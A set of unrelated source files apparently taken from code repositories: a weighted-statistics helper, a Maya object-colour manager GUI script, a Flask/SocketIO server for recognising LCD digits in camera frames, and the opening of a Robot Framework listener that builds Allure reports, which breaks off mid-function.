raise ValueError('lengths of values & weights must be equal & non-zero.')
if sum(weights) <= 0:
raise ValueError('sum of weights must be positive.')
value_list = list(values) # py list comprehension often misunderstands pandas Series indices.
weight_list = list(weights) # "
norm_weights = [wt/sum(weights) for wt in weight_list]
w_mean = sum([nwt * val for (nwt, val) in zip(norm_weights, value_list)])
n_nonzero_weights = sum([w != 0 for w in weight_list])
if n_nonzero_weights == 1:
w_stdev_pop = 0
w_stdev_w_mean = 0
else:
resid2 = [(val-w_mean)**2 for val in value_list]
nwt2 = sum([nwt**2 for nwt in norm_weights])
rel_factor = 1.0 / (1.0 - nwt2) # reliability factor (better than N'/(N'-1))
w_stdev_pop = sqrt(rel_factor * sum([nwt * r2 for (nwt, r2) in zip(norm_weights, resid2)]))
w_stdev_w_mean = sqrt(nwt2) * w_stdev_pop
return w_mean, w_stdev_pop, w_stdev_w_mean |
<reponame>TrevisanGMW/maya<gh_stars>10-100
"""
GT Color Manager - A script for managing the color of many objects at the same time (outliner and other overrides)
@<NAME> - <EMAIL> - 2020-11-13
https://github.com/TrevisanGMW
1.1 - 2020-11-16
Fixed an issue where the color containing rendering space data would be applied to the outliner.
1.2 - 2020-11-23
Fixed an issue with the persistent settings not being updated when importing the script.
1.3 - 2020-12-03
Fixed an issue where shape nodes wouldn't reset properly
1.4 - 2021-05-11
Made script compatible with Python 3 (Maya 2022+)
"""
import maya.cmds as cmds
import random
import math
import copy
import sys
from maya import OpenMayaUI as omui
try:
from shiboken2 import wrapInstance
except ImportError:
from shiboken import wrapInstance
try:
from PySide2.QtGui import QIcon
from PySide2.QtWidgets import QWidget
except ImportError:
from PySide.QtGui import QIcon, QWidget
# Script Name
script_name = "GT Color Manager"
# Version
script_version = "1.4";
# Python Version
python_version = sys.version_info.major
gt_color_manager_settings = { 'current_color': [.3,.3,.3],
'default_mode' : 'Drawing Override',
'default_target' : 'Transform',
'default_set_outliner' : True,
'default_set_viewport' : False}
# Store Default Values for Reseting
gt_color_manager_settings_default_values = copy.deepcopy(gt_color_manager_settings)
def get_persistent_settings_color_manager():
'''
Checks if persistent settings for GT Color Manager exist and transfers them to the settings variables.
It assumes that persistent settings were stored using the cmds.optionVar function.
'''
set_outliner_exists = cmds.optionVar(exists=("gt_color_manager_set_outliner"))
set_viewport_exists = cmds.optionVar(exists=("gt_color_manager_set_viewport"))
set_current_color_exists = cmds.optionVar(exists=("gt_color_manager_current_color"))
set_target_exists = cmds.optionVar(exists=("gt_color_manager_target"))
set_mode_exists = cmds.optionVar(exists=("gt_color_manager_mode"))
if set_outliner_exists:
gt_color_manager_settings['default_set_outliner'] = int(cmds.optionVar(q=("gt_color_manager_set_outliner")))
if set_viewport_exists:
gt_color_manager_settings['default_set_viewport'] = int(cmds.optionVar(q=("gt_color_manager_set_viewport")))
if set_current_color_exists:
try:
color_str_list = cmds.optionVar(q=("gt_color_manager_current_color")).replace('[','').replace(']','').split(',')
gt_color_manager_settings['current_color'] = [float(color_str_list[0]), float(color_str_list[1]), float(color_str_list[2])]
except:
pass
if set_target_exists:
gt_color_manager_settings['default_target'] = str(cmds.optionVar(q=("gt_color_manager_target")))
if set_mode_exists:
gt_color_manager_settings['default_mode'] = str(cmds.optionVar(q=("gt_color_manager_mode")))
def set_persistent_settings_color_manager(option_var_name, option_var_string):
'''
Stores persistent settings for GT Color Manager.
It assumes that persistent settings are using the cmds.optionVar function.
Parameters:
option_var_name (string): name of the optionVar string. Must start with script name + name of the variable
option_var_string (string): string to be stored under the option_var_name
'''
if option_var_string != '' and option_var_name != '':
cmds.optionVar( sv=(str(option_var_name), str(option_var_string)))
def reset_persistent_settings_color_manager():
''' Resets persistent settings for GT Color Manager '''
cmds.optionVar( remove='gt_color_manager_set_outliner' )
cmds.optionVar( remove='gt_color_manager_set_viewport' )
cmds.optionVar( remove='gt_color_manager_current_color' )
cmds.optionVar( remove='gt_color_manager_target' )
cmds.optionVar( remove='gt_color_manager_mode' )
for def_value in gt_color_manager_settings_default_values:
for value in gt_color_manager_settings:
if def_value == value:
gt_color_manager_settings[value] = gt_color_manager_settings_default_values[def_value]
get_persistent_settings_color_manager()
build_gui_color_manager()
cmds.warning('Persistent settings for ' + script_name + ' were cleared.')
# Main Form ============================================================================
def build_gui_color_manager():
''' Builds Main UI '''
window_name = "build_gui_color_manager"
if cmds.window(window_name, exists =True):
cmds.deleteUI(window_name)
# Main GUI Start Here =================================================================================
# Build UI
build_gui_color_manager = cmds.window(window_name, title=script_name + ' (v' + script_version + ')',\
titleBar=True, mnb=False, mxb=False, sizeable =True)
cmds.window(window_name, e=True, s=True, wh=[1,1])
content_main = cmds.columnLayout(adj = True)
# Title Text
title_bgc_color = (.4, .4, .4)
cmds.separator(h=10, style='none') # Empty Space
cmds.rowColumnLayout(nc=1, cw=[(1, 330)], cs=[(1, 10)], p=content_main) # Window Size Adjustment
cmds.rowColumnLayout(nc=3, cw=[(1, 10), (2, 260), (3, 50)], cs=[(1, 10), (2, 0), (3, 0)], p=content_main) # Title Column
cmds.text(" ", bgc=title_bgc_color) # Tiny Empty Green Space
cmds.text(script_name, bgc=title_bgc_color, fn="boldLabelFont", align="left")
cmds.button( l ="Help", bgc=title_bgc_color, c=lambda x:build_gui_help_color_manager())
cmds.separator(h=3, style='none', p=content_main) # Empty Space
# Body ====================
body_column = cmds.rowColumnLayout(nc=1, cw=[(1, 320)], cs=[(1,10)], p=content_main)
cmds.rowColumnLayout(nc=1, cw=[(1, 300)], cs=[(1,10)])
cmds.separator(h=20, p=body_column)
mid_container = cmds.rowColumnLayout(p=body_column, h= 25,nc=2, cw=[(1, 160)], cs=[(1,5),(2,15)])
mode_option = cmds.optionMenu(label='Mode', cc=lambda x:set_persistent_settings_color_manager('gt_color_manager_mode', cmds.optionMenu(mode_option, q=True, value=True)))
cmds.menuItem( label='Drawing Override' )
cmds.menuItem( label='Wireframe Color' )
if gt_color_manager_settings.get('default_mode') == 'Drawing Override':
cmds.optionMenu(mode_option, e=True, select=1) # 1-based selection
else:
cmds.optionMenu(mode_option, e=True, select=2) # 1-based selection
target_option = cmds.optionMenu(label='Target', cc=lambda x:set_persistent_settings_color_manager('gt_color_manager_target', cmds.optionMenu(target_option, q=True, value=True)))
cmds.menuItem( label='Transform' )
cmds.menuItem( label='Shape' )
if gt_color_manager_settings.get('default_target') == 'Transform':
cmds.optionMenu(target_option, e=True, select=1) # 1-based selection
else:
cmds.optionMenu(target_option, e=True, select=2) # 1-based selection
# Main Color Picker
cmds.separator(h=10, style='none', p=body_column) # Empty Space
color_container = cmds.rowColumnLayout(p=body_column, nc=1, h= 25, cw=[(1,310)], cs=[(1,5)])
color_slider = cmds.colorSliderGrp(label='Current Color ', rgb=(gt_color_manager_settings.get("current_color")[0], \
gt_color_manager_settings.get("current_color")[1],\
gt_color_manager_settings.get("current_color")[2]),\
cal=[1,'left'],
columnWidth=((1,80),(3,130)), cc=lambda x:update_stored_values())
cmds.separator(h=7, style='none', p=body_column) # Empty Space
c_btn_w = 30
c_btn_s = 1
cmds.rowColumnLayout(nc=10, cw=[(1,c_btn_w),(2,c_btn_w),(3,c_btn_w),(4,c_btn_w),(5,c_btn_w),(6,c_btn_w),(7,c_btn_w),(8,c_btn_w),(9,c_btn_w),(10,c_btn_w)],\
cs=[(1,5),(2,c_btn_s),(3,c_btn_s),(4,c_btn_s),(5,c_btn_s),(6,c_btn_s),(7,c_btn_s),(8,c_btn_s),(9,c_btn_s),(10,c_btn_s)], p=body_column)
color_buttons_height = 20
# Rainbow
c_btn_01 = [1,.25,.25] # Red
c_btn_02 = [1,.45,.15] # Orange
c_btn_03 = [1,1,.35] # Yellow
c_btn_04 = [.5,1,.20] # Green
c_btn_05 = [.3,1,.8] # Cyan
c_btn_06 = [.2,0.6,1] # Soft Blue
c_btn_07 = [0,.2,1] # Blue
c_btn_08 = [1,.45,.70] # Pink
c_btn_09 = [.75,.35,.90] # Soft Purple
c_btn_10 = [.45,0.2,0.9] # Purple
cmds.button(l='', bgc=c_btn_01, h=color_buttons_height, c=lambda x:apply_preset(c_btn_01))
cmds.button(l='', bgc=c_btn_02, h=color_buttons_height, c=lambda x:apply_preset(c_btn_02))
cmds.button(l='', bgc=c_btn_03, h=color_buttons_height, c=lambda x:apply_preset(c_btn_03))
cmds.button(l='', bgc=c_btn_04, h=color_buttons_height, c=lambda x:apply_preset(c_btn_04))
cmds.button(l='', bgc=c_btn_05, h=color_buttons_height, c=lambda x:apply_preset(c_btn_05))
cmds.button(l='', bgc=c_btn_06, h=color_buttons_height, c=lambda x:apply_preset(c_btn_06))
cmds.button(l='', bgc=c_btn_07, h=color_buttons_height, c=lambda x:apply_preset(c_btn_07))
cmds.button(l='', bgc=c_btn_08, h=color_buttons_height, c=lambda x:apply_preset(c_btn_08))
cmds.button(l='', bgc=c_btn_09, h=color_buttons_height, c=lambda x:apply_preset(c_btn_09))
cmds.button(l='', bgc=c_btn_10, h=color_buttons_height, c=lambda x:apply_preset(c_btn_10))
cmds.separator(h=7, style='none', p=body_column) # Empty Space
cmds.separator(h=15, p=body_column)
bottom_container = cmds.rowColumnLayout(p=body_column,adj=True)
checkbox_column = cmds.rowColumnLayout(p=bottom_container,nc=3, cw=[(1, 80),(2, 100),(3, 100)], cs=[(1,0),(2,60)],nbg=True)
cmds.text('Set Color For')
outliner_chk = cmds.checkBox(label='Outliner', p=checkbox_column, nbg=False, value=gt_color_manager_settings.get('default_set_outliner'),\
cc=lambda x:set_persistent_settings_color_manager('gt_color_manager_set_outliner',\
str(int(cmds.checkBox(outliner_chk, q=True, value=True)))))
viewport_chk = cmds.checkBox(label='Viewport', p=checkbox_column, value=gt_color_manager_settings.get('default_set_viewport'),\
cc=lambda x:set_persistent_settings_color_manager('gt_color_manager_set_viewport',\
str(int(cmds.checkBox(viewport_chk, q=True, value=True)))))
cmds.separator(h=10, style='none', p=bottom_container) # Empty Space
cmds.button(l ="Reset", c=lambda x:set_color(reset=True), p=bottom_container) # Empty Space
cmds.separator(h=5, style='none', p=bottom_container)
cmds.button(l ="Apply", bgc=(.6, .6, .6), c=lambda x:set_color(), p=bottom_container)
cmds.separator(h=10, style='none', p=bottom_container) # Empty Space
def update_stored_values():
''' Updates Current Color '''
gt_color_manager_settings["current_color"] = cmds.colorSliderGrp(color_slider, q=True, rgb=True) # for outliner?
set_persistent_settings_color_manager('gt_color_manager_current_color', cmds.colorSliderGrp(color_slider, q=True, rgb=True))
def apply_preset(rgb_color):
'''
Updates current color with the provided input then runs main function.
Parameters:
rgb_color (list): a list of three floats describing an RGB Color (e.g. [1,0,0] for Red)
'''
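# The transform below approximates the sRGB-to-linear transfer function,
# ((c + 0.055) / 1.055) ** 2.4, so the slider stores a rendering-space color that
# displays as the chosen preset; note it omits the small linear segment of the full
# piecewise sRGB curve.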
managed_r = math.pow((rgb_color[0] + 0.055) / 1.055, 2.4)
managed_g = math.pow((rgb_color[1] + 0.055) / 1.055, 2.4)
managed_b = math.pow((rgb_color[2] + 0.055) / 1.055, 2.4)
cmds.colorSliderGrp(color_slider, e=True, rgb= (managed_r,managed_g,managed_b))
update_stored_values()
set_color()
def set_color(reset=False):
'''
Uses the provided settings to manage colors (Main function of this script)
Parameter:
reset (bool): Type of operation. Reset active will restore default colors.
'''
errors = ''
try:
function_name = 'GT Color Manager - Set Color'
cmds.undoInfo(openChunk=True, chunkName=function_name)
valid_selection = True
objects_to_color = []
colored_total = 0
# Grab Necessary Values
mode = cmds.optionMenu(mode_option, q=True, value=True)
target = cmds.optionMenu(target_option, q=True, value=True)
color = gt_color_manager_settings.get('current_color')
set_outliner = cmds.checkBox(outliner_chk, q=True, value=True)
set_viewport = cmds.checkBox(viewport_chk, q=True, value=True)
# Functions
def set_color_drawing_override(obj_to_set):
'''
Uses drawing override settings to set the color of an object
Parameters:
obj_to_set (str): Name (path) of the object to affect.
'''
using_wireframe = cmds.getAttr(obj_to_set + '.useObjectColor')
if using_wireframe != 0:
cmds.color( obj_to_set )
cmds.setAttr(obj_to_set + '.overrideEnabled', 1)
cmds.setAttr(obj_to_set + '.overrideRGBColors', 1)
cmds.setAttr(obj_to_set + '.overrideColorR', color[0])
cmds.setAttr(obj_to_set + '.overrideColorG', color[1])
cmds.setAttr(obj_to_set + '.overrideColorB', color[2])
return 1
def set_color_wireframe_tool(obj_to_set):
'''
Uses wireframe color to set the color of an object
Parameters:
obj_to_set (str): Name (path) of the object to affect.
'''
using_override = cmds.getAttr(obj_to_set + '.overrideEnabled')
if using_override:
cmds.setAttr(obj_to_set + '.overrideEnabled', 0)
cmds.setAttr(obj_to_set + '.overrideColorR', 0)
cmds.setAttr(obj_to_set + '.overrideColorG', 0)
cmds.setAttr(obj_to_set + '.overrideColorB', 0)
cmds.color( obj_to_set, rgb=(color[0], color[1], color[2]) )
return 1
def set_color_outliner(obj_to_set):
'''
Sets the outliner color for the selected object
Parameters:
obj_to_set (str): Name (path) of the object to affect.
'''
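# 0.454 is roughly 1/2.2, i.e. an approximate linear-to-sRGB gamma encode, so the
# outliner (which expects display-space values) shows the same color that was picked.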
extracted_r = math.pow(color[0], 0.454)
extracted_g = math.pow(color[1], 0.454)
extracted_b = math.pow(color[2], 0.454)
cmds.setAttr(obj_to_set + '.useOutlinerColor', 1)
cmds.setAttr(obj_to_set + '.outlinerColorR', extracted_r)
cmds.setAttr(obj_to_set + '.outlinerColorG', extracted_g)
cmds.setAttr(obj_to_set + '.outlinerColorB', extracted_b)
return 1
def set_color_reset(obj_to_set, reset_overrides=False, reset_wireframe=False, reset_outliner=False):
''' Resets the color of the selected objects
Parameters:
obj_to_set (str): Name (path) of the object to affect.
reset_overrides (bool) : Resetting Overrides
reset_wireframe (bool) : Resetting Wireframe
reset_outliner (bool) : Resetting Outliner
'''
if reset_overrides:
using_override = cmds.getAttr(obj_to_set + '.overrideEnabled')
if using_override:
cmds.setAttr(obj_to_set + '.overrideEnabled', 0)
cmds.setAttr(obj_to_set + '.overrideColorR', 0)
cmds.setAttr(obj_to_set + '.overrideColorG', 0)
cmds.setAttr(obj_to_set + '.overrideColorB', 0)
if reset_wireframe:
using_wireframe = cmds.getAttr(obj_to_set + '.useObjectColor')
if using_wireframe != 0:
cmds.color( obj_to_set )
if reset_outliner:
try:
cmds.setAttr(obj_to_set + '.useOutlinerColor', 0)
except:
pass
return 1
selection = cmds.ls(selection=True)
if len(selection) < 1:
valid_selection = False
cmds.warning('You need to select at least one object.')
if valid_selection:
# Determine what to color
if target == 'Transform':
objects_to_color = selection
else:
for sel in selection:
shapes = cmds.listRelatives(sel, shapes=True, fullPath=True) or []
for shape in shapes:
objects_to_color.append(shape)
# Determine total of objects to be colored
if len(objects_to_color) < 1:
valid_selection = False
cmds.warning('No shapes were found. Make sure you\'re using the correct "Target" option.')
# Set Color
if valid_selection and reset == False:
for obj in objects_to_color:
if set_viewport:
try:
if mode == 'Drawing Override':
colored_total += set_color_drawing_override(obj)
else:
colored_total += set_color_wireframe_tool(obj)
except Exception as e:
errors += str(e) + '\n'
if set_outliner:
try:
if set_viewport:
set_color_outliner(obj)
else:
colored_total += set_color_outliner(obj)
except Exception as e:
errors += str(e) + '\n'
if valid_selection and reset == True:
for obj in objects_to_color:
if set_viewport:
try:
colored_total += set_color_reset(obj, reset_overrides=True, reset_wireframe=True)
except Exception as e:
errors += str(e) + '\n'
if set_outliner:
try:
if set_viewport:
set_color_reset(obj, reset_outliner=True)
else:
colored_total += set_color_reset(obj, reset_outliner=True)
except Exception as e:
errors += str(e) + '\n'
# Create message
message = '<' + str(random.random()) + '><span style=\"color:#FF0000;text-decoration:underline;\">' + str(colored_total) + ' </span>'
is_plural = 'objects were'
if colored_total == 1:
is_plural = 'object was'
if reset:
message += is_plural + ' reset to the default color.'
else:
message += is_plural + ' colored.'
cmds.inViewMessage(amg=message, pos='botLeft', fade=True, alpha=.9)
except Exception as e:
errors += str(e) + '\n'
finally:
cmds.undoInfo(closeChunk=True, chunkName=function_name)
if errors != '':
cmds.warning('An error occurred. Open the script editor for more information.')
print('######## Errors: ########')
print(errors)
# Show and Lock Window
cmds.showWindow(build_gui_color_manager)
cmds.window(window_name, e=True, s=False)
# Set Window Icon
qw = omui.MQtUtil.findWindow(window_name)
if python_version == 3:
widget = wrapInstance(int(qw), QWidget)
else:
widget = wrapInstance(long(qw), QWidget)
icon = QIcon(':/render_swColorPerVertex.png')
widget.setWindowIcon(icon)
# Main GUI Ends Here =================================================================================
# Creates Help GUI
def build_gui_help_color_manager():
window_name = "build_gui_help_color_manager"
if cmds.window(window_name, exists=True):
cmds.deleteUI(window_name, window=True)
cmds.window(window_name, title= script_name + " Help", mnb=False, mxb=False, s=True)
cmds.window(window_name, e=True, s=True, wh=[1,1])
cmds.columnLayout("main_column", p= window_name)
# Title Text
title_bgc_color = (.4, .4, .4)
cmds.separator(h=12, style='none') # Empty Space
cmds.rowColumnLayout(nc=1, cw=[(1, 310)], cs=[(1, 10)], p="main_column") # Window Size Adjustment
cmds.rowColumnLayout(nc=1, cw=[(1, 300)], cs=[(1, 10)], p="main_column") # Title Column
cmds.text(script_name + " Help", bgc=title_bgc_color, fn="boldLabelFont", align="center")
cmds.separator(h=10, style='none', p="main_column") # Empty Space
# Body ====================
cmds.rowColumnLayout(nc=1, cw=[(1, 300)], cs=[(1,10)], p="main_column")
cmds.text(l='Script for quickly coloring elements in Maya', align="center")
cmds.separator(h=15, style='none') # Empty Space
cmds.text(l='Modes:', align="center", fn="tinyBoldLabelFont")
cmds.text(l='- Drawing Override:\n Utilize "Object > Object Display > Drawing Overrides" to set color', align="center", font='smallPlainLabelFont')
cmds.text(l='- Wireframe Color:\n Utilize "Display > Wireframe Color..." to set color', align="center", font='smallPlainLabelFont')
cmds.separator(h=10, style='none') # Empty Space
cmds.text(l='Target:', align="center", fn="tinyBoldLabelFont")
cmds.text(l='- Transform:\n Colorize actual selection. Usually a "transform"', align="center", font='smallPlainLabelFont')
cmds.text(l='- Shape:\n Colorize the shape node inside the transform', align="center", font='smallPlainLabelFont')
cmds.separator(h=10, style='none') # Empty Space
cmds.text(l='Current Color:', align="center", fn="tinyBoldLabelFont")
cmds.text(l='The color used in the operation', font='smallPlainLabelFont')
cmds.separator(h=10, style='none') # Empty Space
cmds.text(l='Color Presets:', align="center", fn="tinyBoldLabelFont")
cmds.text(l='A list of common colors. When clicking it sets the color', font='smallPlainLabelFont')
cmds.separator(h=10, style='none') # Empty Space
cmds.text(l='Set Color For:', align="center", fn="tinyBoldLabelFont")
cmds.text(l='- Outliner:\n Control the outliner color', align="center", font='smallPlainLabelFont')
cmds.text(l='- Viewport:\n Control the wireframe color seen in the viewport', align="center", font='smallPlainLabelFont')
cmds.separator(h=15, style='none') # Empty Space
cmds.rowColumnLayout(nc=2, cw=[(1, 140),(2, 140)], cs=[(1,10),(2, 0)], p="main_column")
cmds.text('<NAME> ')
cmds.text(l='<a href="mailto:<EMAIL>"><EMAIL></a>', hl=True, highlightColor=[1,1,1])
cmds.rowColumnLayout(nc=2, cw=[(1, 140),(2, 140)], cs=[(1,10),(2, 0)], p="main_column")
cmds.separator(h=15, style='none') # Empty Space
cmds.text(l='<a href="https://github.com/TrevisanGMW">Github</a>', hl=True, highlightColor=[1,1,1])
cmds.separator(h=7, style='none') # Empty Space
# Close Button
cmds.rowColumnLayout(nc=1, cw=[(1, 300)], cs=[(1,10)], p="main_column")
cmds.separator(h=10, style='none')
cmds.button(l='Reset Persistent Settings', h=30, c=lambda args: reset_persistent_settings_color_manager())
cmds.separator(h=5, style='none')
cmds.button(l='OK', h=30, c=lambda args: close_help_gui())
cmds.separator(h=8, style='none')
# Show and Lock Window
cmds.showWindow(window_name)
cmds.window(window_name, e=True, s=False)
# Set Window Icon
qw = omui.MQtUtil.findWindow(window_name)
if python_version == 3:
widget = wrapInstance(int(qw), QWidget)
else:
widget = wrapInstance(long(qw), QWidget)
icon = QIcon(':/question.png')
widget.setWindowIcon(icon)
def close_help_gui():
if cmds.window(window_name, exists=True):
cmds.deleteUI(window_name, window=True)
# Build Main Dialog
get_persistent_settings_color_manager()
if __name__ == '__main__':
build_gui_color_manager() |
<filename>lcd_digit_recognizer/web/app.py
import base64
import gc
import json
import os
import threading
import time
import traceback
from multiprocessing import freeze_support
from pympler import muppy, summary
import eventlet
eventlet.monkey_patch()
import numpy as np
import cv2
from flask import Flask, render_template, make_response, request
from flask_bootstrap import Bootstrap
from flask_socketio import SocketIO, send, emit, join_room
from lcd_digit_recognizer.web.recognition_service import RecognitionService
this_file_dir_path = os.path.dirname(os.path.realpath(__file__))
HTTP_PORT = 7894
HISTORY_DIR = "/tmp/cupr_history"
MAX_HISTORY_LENGTH = 1000
# run env initialization
RECOGNITION_SERVICE = None # will be initialized later (due to process forking interference with flask)
os.makedirs(HISTORY_DIR, exist_ok=True)
# prepare server
app = Flask(__name__)
app.secret_key = b'effer234\n\xec]/'
Bootstrap(app)
socketio = SocketIO(app, cors_allowed_origins="*", async_mode="eventlet")
@app.route("/nocamera")
def nocamera():
return render_template("nocamera.html")
@app.route("/static/<static_file>.css")
def dynamic_css(static_file):
path = os.path.join(this_file_dir_path, f"static/{static_file}.css")
with open(path) as f:
r = make_response(f.read())
r.headers["Content-type"] = "text/css"
return r
@app.route("/static/<static_file>.js")
def dynamic_js(static_file):
path = os.path.join(this_file_dir_path, f"static/{static_file}.js")
with open(path) as f:
r = make_response(f.read())
r.headers["Content-type"] = "text/javascript"
return r
@app.route("/")
def index():
return render_template("index.html")
@app.route("/camera_debug")
def camera_debug():
return render_template("camera_debug.html")
@app.route("/history_filler")
def history_filler():
return render_template("history_filler.html")
@app.route("/history")
def image_history():
return render_template("history.html")
@app.route("/dashboard")
def dashboard():
return render_template("dashboard.html")
@app.route("/recognition_history")
def recognition_history():
result = []
for file_name in os.listdir(HISTORY_DIR):
if file_name.endswith(".rcg"):
result.append(file_name[:-4])
result.sort()
result.reverse()
return render_template("recognition_history.html", ids=result)
@app.route("/show_image/<id>")
def show_image(id):
with open(f"{HISTORY_DIR}/{id}.png", "br") as f:
image_binary = f.read()
response = make_response(image_binary)
response.headers.set("Content-Type", "image/png")
return response
@app.route("/show_recognition_json/<id>")
def show_recognition_json(id):
try:
with open(f"{HISTORY_DIR}/{id}.rcg", "r") as f:
recognition_json = f.read()
except Exception:
return json.dumps({
"exception": traceback.format_exc()
})
response = make_response(recognition_json)
response.headers.set("Content-Type", "application/json")
return response
@app.route("/show_recognition/<id>")
def show_recognition(id):
with open(f"{HISTORY_DIR}/{id}.rcg", "r") as f:
recognized_number = f.read()
return render_template("show_recognition.html", recognized_number=recognized_number, id=id)
@socketio.on("clear_history")
def handle_clear_history(message):
sid = request.sid
RECOGNITION_SERVICE.close_context(sid)
@socketio.on("frame")
def handle_frame(message):
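# Expected payload (inferred from the handling below; field names as used by this handler):
#   {"image": "<base64-encoded image bytes, in any format cv2.imdecode accepts>",
#    "input_id": "<optional client-side identifier>"}
# The decoded frame is queued for recognition and also written to HISTORY_DIR as a PNG.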
try:
sid = request.sid
image_bytes = base64.b64decode(message["image"])
input_id = message.get("input_id", None)
timestamp = time.time()
server_image_id = str(timestamp)
nparr = np.frombuffer(image_bytes, np.uint8)  # np.fromstring is deprecated for binary input
img_np = cv2.imdecode(nparr, cv2.IMREAD_COLOR)
if img_np is None or len(img_np) == 0:
raise AssertionError("Image could not be load correctly (probably incorrect format)")
RECOGNITION_SERVICE.add_job(sid, server_image_id, img_np, input_id)
output_path = f"{HISTORY_DIR}/{server_image_id}.png"
cv2.imwrite(output_path, img_np)
emit("frame_result", {
"code": "ok",
"input_id": input_id,
"server_image_id": server_image_id,
"sid": sid,
})
except Exception as e:
emit("frame_result", {
"code": "failed",
"error": str(e),
"input": message
})
@socketio.on('connect')
def handle_connect():
print('Client connected ' + request.sid)
@socketio.on('disconnect')
def handle_disconnect():
sid = request.sid
print('Client disconnected ' + sid)
RECOGNITION_SERVICE.close_context(sid)
@app.route("/.well-known/acme-challenge/<name>")
def cert(name):
if "/" in name:
# prevent file leaks
return "Invalid path"
with open(f"/tmp/.well-known/acme-challenge/{name}") as f:
return f.read()
def report_recognition(sid, image_id, result):
with open(os.path.join(HISTORY_DIR, image_id + ".rcg"), "w") as f:
f.write(str(result))
socketio.emit("recognition_result", result, room=sid)
def run_history_cleaner():
gc.collect()
all_objects = muppy.get_objects()
sum1 = summary.summarize(all_objects)
# Prints out a summary of the large objects
summary.print_(sum1)
remove_files(".png")
remove_files(".rcg")
threading.Timer(60, run_history_cleaner).start()
def remove_files(extension):
file_paths = []
for name in os.listdir(HISTORY_DIR):
if not name.endswith(extension):
continue
file_paths.append(os.path.join(HISTORY_DIR, name))
file_paths.sort()
while len(file_paths) > MAX_HISTORY_LENGTH:
path_to_delete = file_paths.pop(0)
os.unlink(path_to_delete)
@app.after_request
def add_header(response):
# response.cache_control.no_store = True
if 'Cache-Control' not in response.headers:
response.headers['Cache-Control'] = 'no-store'
return response
def print_banner(http_port):
print("Today's menu:")
print()
print(" http://localhost:{}/".format(str(http_port)))
print(" http://localhost:{}/camera_debug".format(str(http_port)))
print(" http://localhost:{}/nocamera".format(str(http_port)))
print(" http://localhost:{}/history".format(str(http_port)))
print(" http://localhost:{}/history_filler".format(str(http_port)))
print(" http://localhost:{}/recognition_history".format(str(http_port)))
print("")
if __name__ == "__main__":
freeze_support()
run_history_cleaner()
if "DEBUG_MODE" in os.environ:
use_reloader = True
debug = True
start_recognition = False
else:
use_reloader = False
debug = False
start_recognition = True
RECOGNITION_SERVICE = RecognitionService(recognition_callback=report_recognition)
if start_recognition:
RECOGNITION_SERVICE.start()
print_banner(HTTP_PORT)
socketio.run(app, host='0.0.0.0', port=HTTP_PORT, use_reloader=use_reloader, debug=debug)
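# Minimal client sketch (assumes the python-socketio client package; names and the file
# path below are placeholders, not part of this app):
#
#   import base64, socketio
#   sio = socketio.Client()
#   sio.on("frame_result", lambda data: print("frame ack:", data))
#   sio.on("recognition_result", lambda data: print("recognized:", data))
#   sio.connect("http://localhost:7894")
#   with open("display.png", "rb") as f:
#       sio.emit("frame", {"image": base64.b64encode(f.read()).decode(), "input_id": "1"})
#   sio.wait()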
|
import collections
from contextlib import contextmanager
from functools import wraps
import io
from itertools import cycle
import logging
import os
import pprint
import re
import shutil
import socket
import subprocess
from sys import version, stderr
import sys
import threading
import time
import uuid
from warnings import catch_warnings
import webbrowser
from allure.common import AttachmentType
from allure.constants import Status, Label
from allure.structure import Environment, EnvParameter, TestLabel, Failure, Attach, TestSuite, TestStep
from allure.utils import now
import jprops
from lxml import etree
from oauthlib.uri_validate import path
import py
from robot.api import logger
from robot.libraries.BuiltIn import BuiltIn
from robot.libraries.Process import Process
from robot.libraries.Screenshot import Screenshot
from robot.running.userkeyword import UserLibrary
from robot.version import get_version, get_full_version, get_interpreter
from six import text_type, iteritems
from sqlalchemy.sql.expression import false
from common import AllureImpl
from constants import Robot, ROBOT_OUTPUT_FILES, SEVERITIES, STATUSSES
from structure import AllureProperties, TestCase # Overriding TestCase due to missing severity attribute.
from util_funcs import clear_directory, copy_dir_contents
from version import VERSION
# for debugging purpose not needed by application
class AllureListener(object):
ROBOT_LISTENER_API_VERSION = 2
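# Summary of how this listener works (derived from the methods below): Robot Framework
# invokes start_suite/start_test/start_keyword and their end_* counterparts; open Allure
# TestCase/TestStep objects are kept on self.stack, and when an end_* call closes them
# they are appended to their parent (the enclosing step, the test, or self.testsuite).
# end_suite writes the finished TestSuite to an Allure XML file and close() stores the
# environment and optionally runs the Allure CLI report generation.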
def __init__(self, allurePropPath=None, source='Listener'):
self.stack = []
self.testsuite = None
self.callstack = []
self.AllurePropPath = allurePropPath
self.AllureIssueIdRegEx = ''
self.isFirstSuite = True
# Setting this variable prevents the loading of a Library added Listener.
# In case the Listener is added via Command Line, the Robot Context is not
# yet there and would cause an exception. Similar section in start_suite.
try:
AllureListenerActive = BuiltIn().get_variable_value('${ALLURE}', false)
BuiltIn().set_global_variable('${ALLURE}', True)
except:
pass
def start_suitesetup(self, name, attributes):
start_test_attributes= {'critical': 'yes',
'doc': 'Test Suite Setup section',
'starttime': attributes['starttime'],
'tags': [],
'id': 's1-s1-t0',
'longname': BuiltIn().get_variable_value('${SUITE_NAME}'),
'template': ''
}
if len(str(start_test_attributes.get('doc'))) > 0:
description = str(start_test_attributes.get('doc'))
else:
description = name
test = TestCase(name=name,
description=description,
start=now(),
attachments=[],
labels=[],
# parameters=[],
steps=[])
self.stack.append(test)
return
def end_suitesetup(self, name, attributes):
end_test_attributes= {'critical': 'yes',
'doc': 'Test Suite Setup section',
'starttime': attributes['starttime'],
'endtime': attributes['endtime'],
'status': 'PASS',
'tags': [],
'id': 's1-s1-t0',
'longname': BuiltIn().get_variable_value('${SUITE_NAME}'),
'template': ''
}
test = self.stack.pop()
BuiltIn().run_keyword(name)
if end_test_attributes.get('status') == Robot.PASS:
test.status = Status.PASSED
elif end_test_attributes.get('status')==Robot.FAIL:
test.status = Status.FAILED
test.failure = Failure(message=end_test_attributes.get('message'), trace='')
elif end_test_attributes.get('doc') != '':
test.description = attributes.get('doc')
if end_test_attributes['tags']:
for tag in end_test_attributes['tags']:
if re.search(self.AllureIssueIdRegEx, tag):
test.labels.append(TestLabel(
name=Label.ISSUE,
value=tag))
if tag.startswith('feature'):
test.labels.append(TestLabel(
name='feature',
value=tag.split(':')[-1]))
if tag.startswith('story'):
test.labels.append(TestLabel(
name='story',
value=tag.split(':')[-1]))
elif tag in SEVERITIES:
test.labels.append(TestLabel(
name='severity',
value=tag))
elif tag in STATUSSES:
test.status = tag # overwrites the actual test status with this value.
self.PabotPoolId = BuiltIn().get_variable_value('${PABOTEXECUTIONPOOLID}')
if(self.PabotPoolId is not None):
